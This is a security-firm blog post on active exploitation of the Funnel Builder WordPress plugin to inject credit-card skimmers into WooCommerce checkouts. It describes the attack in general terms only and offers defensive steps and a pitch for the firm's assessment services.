Critical WordPress Plugin Vulnerability Exposes Online Stores to Credit Card Theft
A dangerous WordPress plugin vulnerability is currently being exploited by cybercriminals to steal credit card information from thousands of WooCommerce stores across Australia and globally. Security researchers have confirmed that attackers are actively targeting the popular Funnel Builder plugin, injecting malicious JavaScript code into checkout pages to harvest customer payment data in real time.
This attack represents a significant threat to e-commerce businesses, particularly small and medium enterprises that rely on WordPress and WooCommerce for their online sales operations. If your business uses this plugin, immediate action is required to protect your customers and your reputation.
Original reporting by BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards — May 17, 2026
What Happened With the Funnel Builder Plugin?
The vulnerability affects Funnel Builder for WordPress, a widely-used plugin that helps businesses create sales funnels and optimise their WooCommerce checkout experience. Security analysts discovered that a critical flaw in the plugin’s code allows unauthenticated attackers to inject malicious scripts directly into checkout pages.
Once exploited, the attackers deploy JavaScript-based credit card skimmers that capture payment information as customers enter their details. This data is then silently transmitted to attacker-controlled servers without the store owner or customer being aware of the compromise.
Timeline of the Attack
- Initial discovery: Security researchers identified active exploitation in mid-May 2026
- Attack vector: Unauthenticated remote code injection via plugin vulnerability
- Payload: Obfuscated JavaScript credit card skimmer
- Data exfiltration: Real-time transmission of payment details to external servers
How Does This WordPress Plugin Vulnerability Work?
The technical nature of this attack makes it particularly dangerous because it requires no authentication. Attackers can exploit the WordPress plugin vulnerability remotely without needing login credentials or administrative access to the target website.
Attack Mechanics Explained
The vulnerability exists in how the Funnel Builder plugin handles certain input parameters. Attackers craft specially designed requests that bypass security controls, allowing them to inject arbitrary JavaScript code into the plugin’s output.
This injected code specifically targets WooCommerce checkout forms, adding invisible event listeners that capture:
- Credit card numbers
- Cardholder names
- Expiration dates
- CVV/security codes
- Billing addresses
The stolen data is then encoded and transmitted to command-and-control servers, often disguised as legitimate analytics or tracking requests to avoid detection by security tools.
Business Impact of Credit Card Skimming Attacks
For Australian businesses, the consequences of a credit card skimming attack extend far beyond the immediate theft. The financial and reputational damage can be devastating, particularly for small e-commerce operators.
Direct Financial Consequences
- PCI DSS compliance violations: Fines ranging from $5,000 to $100,000 per month
- Chargeback liability: Responsibility for fraudulent transactions
- Forensic investigation costs: Mandatory incident response and auditing
- Legal exposure: Potential class action lawsuits from affected customers
Reputational Damage
Consumer trust is difficult to rebuild once compromised. Research indicates that 65% of customers will not return to a business that has experienced a data breach. For e-commerce stores operating in competitive markets, this loss of confidence can be terminal.
Australian businesses also face obligations under the Notifiable Data Breaches scheme, requiring disclosure to affected individuals and the Office of the Australian Information Commissioner when payment data is compromised.
How to Protect Your WooCommerce Store
Immediate action is essential if your business uses the Funnel Builder plugin or operates a WooCommerce store. The following recommendations will help secure your site against this specific WordPress plugin vulnerability and similar threats.
Immediate Steps
- Update immediately: Check for and apply the latest Funnel Builder plugin update
- Audit your checkout pages: Inspect source code for unfamiliar JavaScript
- Review user accounts: Check for unauthorised administrator accounts
- Scan for malware: Run comprehensive security scans across your WordPress installation
- Check file integrity: Compare core files against known-good versions
Long-Term Security Measures
- Implement a Web Application Firewall (WAF): Block malicious requests before they reach your site
- Enable Content Security Policy headers: Restrict which scripts can execute on your pages
- Use Subresource Integrity: Verify that external scripts haven’t been tampered with
- Conduct regular vulnerability assessments: Identify weaknesses before attackers do
- Maintain plugin hygiene: Remove unused plugins and keep all components updated
If you’re unsure whether your site has been compromised, consider engaging OziTechs’ vulnerability management services for a comprehensive security assessment.
Frequently Asked Questions
What is a credit card skimming attack on WordPress?
A credit card skimming attack occurs when malicious JavaScript code is injected into an e-commerce website’s checkout pages. This code secretly captures payment information as customers enter it, then transmits the data to attackers. On WordPress sites, these attacks typically exploit vulnerabilities in plugins or themes to inject the skimmer code.
How can I tell if my WooCommerce store has been compromised?
Signs of compromise include unexpected JavaScript in your checkout pages, unfamiliar user accounts with administrator privileges, unusual outbound network connections, and customer reports of fraudulent charges. However, sophisticated skimmers are designed to avoid detection, making professional security audits essential for definitive assessment.
Is my business liable if customer credit cards are stolen through my website?
Yes, Australian businesses have legal obligations to protect customer data under the Privacy Act 1988 and PCI DSS requirements. If a breach occurs due to inadequate security measures, you may face regulatory penalties, chargeback liability, and potential legal action from affected customers. Proactive security measures and incident response planning are essential risk mitigation strategies.
Key Takeaways
- The Funnel Builder WordPress plugin vulnerability is being actively exploited to steal credit card data
- Attackers can inject malicious skimmers without authentication
- WooCommerce checkout pages are the primary target for payment data theft
- Immediate plugin updates and security audits are essential
- Australian businesses face significant regulatory and financial consequences from payment data breaches
- Implementing WAF protection and Content Security Policies provides additional defence layers
Protect Your Business From WordPress Plugin Vulnerabilities
This WordPress plugin vulnerability serves as a stark reminder that e-commerce security requires constant vigilance. With attackers actively targeting WooCommerce stores, Australian businesses must prioritise their cybersecurity posture to protect both their customers and their operations.
Don’t wait until your business becomes a victim. Proactive security measures, regular vulnerability assessments, and expert guidance can mean the difference between a secure operation and a costly breach.
If you’re concerned about the security of your WordPress or WooCommerce site, speak with our security team today. OziTechs provides comprehensive e-commerce security assessments and ongoing protection services tailored to Australian businesses.